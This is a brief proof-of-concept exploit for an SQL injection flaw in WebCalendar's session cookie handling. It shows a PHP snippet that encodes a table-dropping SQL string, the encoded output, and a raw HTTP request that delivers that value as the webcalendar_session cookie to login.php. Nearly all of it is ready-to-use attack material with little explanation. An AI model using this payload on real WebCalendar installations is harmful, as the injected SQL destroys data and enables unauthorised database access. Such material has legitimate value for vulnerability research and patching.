WebCalendar SQL Injection Vulnerability
No exploit is required. The following proof of concept is available:

    <?php
    include_once 'includes/init.php';
    echo encode_string("'; drop table foo; select 'a|zzabcdefg");
    ?>

output:

    7c8c3a738e858f4199b6b386743c7c8e906075c47f7b817993414cb6cd94897d7882858abbb8

attack payload:

    telnet example.com
    GET /login.php HTTP/1.1
    Cookie: webcalendar_session=7c8c3a738e858f4199b6b386743c7c8e906075c47f7b817993414cb6cd94897d7882858abbb8